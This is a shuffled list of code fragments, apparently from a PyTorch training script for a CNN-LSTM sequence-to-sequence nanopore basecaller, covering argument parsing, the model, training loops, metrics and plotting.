"epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item()",
"updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer",
"args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value",
"and a few hundreds, e.g. [batch size] = 32 is a good default",
"dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD = args.editD sgd",
"updates from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))),",
"30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = []",
"F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going",
"cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder",
"+ \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start,",
"n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing",
"total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0]",
"where a and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1",
"type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden",
"Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\",",
"= seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len",
"= (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val =",
"acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train =",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val],",
"forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size())",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1)",
"\"None\" and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n =",
"val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation:",
"reads, kernel size = 11 start = time.time() out12 = trainNet( model12, train_ds",
"nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels",
"is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides,",
"distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend()",
"(running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we have",
"from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end):",
"/ float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100))",
"= torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred,",
"None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler",
"\"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf,",
"as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import",
"########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len)",
"1. Redistributions of source code must retain the above copyright notice, this list",
"OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\"",
"p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\")",
"and use in source and binary forms, with or without modification, are permitted",
"token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode",
"this locator puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())),",
"plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100",
"def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig",
"vs. updates from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"= matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if",
"k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if",
"const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?',",
"vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None,",
"top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\")",
"ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05,",
"onehot # [batch size, out dim] return outputs, hidden # Sequence to sequence",
"p.keys(): if epoch % print_epoch == 0 or epoch == max(p.keys()): x =",
"forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder",
"loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index]",
"ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing",
"relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out =",
"= 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) #",
"make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port",
"import math import torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing",
"= bidirectional self.port=port self.attention = attention self.dropout = dropout # Define the LSTM",
"Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0,",
"pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure()",
"loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape",
"* LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def",
"end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in",
"ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed",
"'/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn",
"neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx,",
"import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start =",
"import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object):",
"the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len",
"notpadded_index = reshaped_sorted_labels != 5 # indices of not padded elements loss =",
"= input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2)",
"\\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead",
"CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR",
"teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val =",
"= nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if",
"= args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr =",
"0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs",
"= true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target",
"own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder",
"print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this",
"self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim,",
"# [max. target length, batch size, output dim] top1 = input_decoder.argmax(1) # get",
"indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item()",
"num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden,",
"return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim,",
"as sns import pandas as pd import argparse from distutils.util import strtobool from",
"= data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10 =",
"sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output,",
"{} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {}",
"seq_len, output_dim] # shape of self.hidden: (a, b), where a and b both",
"Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in source and",
"f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch,",
"* c) + (ingate * cellgate) hy = outgate * F.tanh(cy) return hy,",
"parser # Network # ----------- # * CNN-Encoder # * LSTM-Encoder # *",
"{}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration +",
"parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob',",
"0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w = None",
"and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >=",
"early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"Update encoder and decoder optimizer.step() if (val_ds != None) and (updates % make_validation",
"epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates %",
"if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn",
"1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch %",
"batch, input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) #",
"0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0",
"# This is what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size,",
"= nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std =",
"put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with",
"padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len,",
"SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py",
"(ingate * cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(),",
"operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort",
"decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {}",
"of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\",",
"n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop",
"seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length",
"loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val =",
"seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0),",
"\"Hidden dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers,",
"editD: cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates)",
"+ '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1]",
"train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(),",
"WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE",
"object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size",
"editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0,",
"= None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr:",
"np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc),",
"self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std =",
"optimizer.step() if (val_ds != None) and (updates % make_validation == 0): # or",
"= 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" *",
"{0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) *",
"start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell",
"self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll =",
"self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input',",
"self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional",
"from validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))),",
"label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\")",
"3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates':",
"output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\")",
"= args.input fname = args.output port = args.gpu_port SEED = args.set_seed batch =",
"clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None:",
"#Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if",
"----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size =",
"epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss",
"validation loss to check if it has decresed, # and if it has,",
"index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path",
"plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf,",
"running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b",
"sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0,",
"= val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y =",
"early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv,",
"else: teacher_forcing_ratio # Evaluation on the validation set val_losses = [] val_acc =",
"nargs='?', const=True, default=False) return parser # Network # ----------- # * CNN-Encoder #",
"import random import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from",
"== max_in_batch: break # when seq length (i) >= true seq length if",
"iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing",
"= dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch,",
"USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.",
"# if we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio *",
"5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes =",
"token] for i in max_for: # Stop looping if we got to the",
"n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0],",
"that they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted",
"train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(),",
"\", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(),",
"\"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3]))",
"bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias",
"\"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases",
"\"linear\" not in p: n = matrix_param[p].shape[0] # input gate start, end =",
"only batches that are NOT padded h = hidden[0][:, not_padded_batches, :] c =",
"fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\")",
"needs the validation loss to check if it has decresed, # and if",
"input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers,",
"seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] #",
"# create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size,",
"{} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {}",
"== 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m =",
"seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of",
"if split_LSTMbiases and \"bias\" in p and \"lstm\" in p and \"linear\" not",
"0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn",
"pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1,",
"torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname),",
"val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the",
"= divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint =",
"\"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\")",
"epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd",
"const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?',",
"LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx =",
"1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes",
"editD = args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED)",
"= max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances",
"+= acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val +=",
"updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] =",
"dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going to",
"input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\"",
"np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b =",
"= input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k])",
"or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and",
"AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE",
"type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\")",
"=====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\",",
"label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle)",
"convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val",
"= args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher =",
"'--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v',",
"p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{}",
"cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5,",
"#!/usr/bin/env python \"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved.",
"val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0]",
"= 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" *",
"parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len =",
"print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \"",
"shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size,",
"validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number',",
"label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit",
"print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] =",
"output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output",
"earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value =",
"= x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) #",
"print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds",
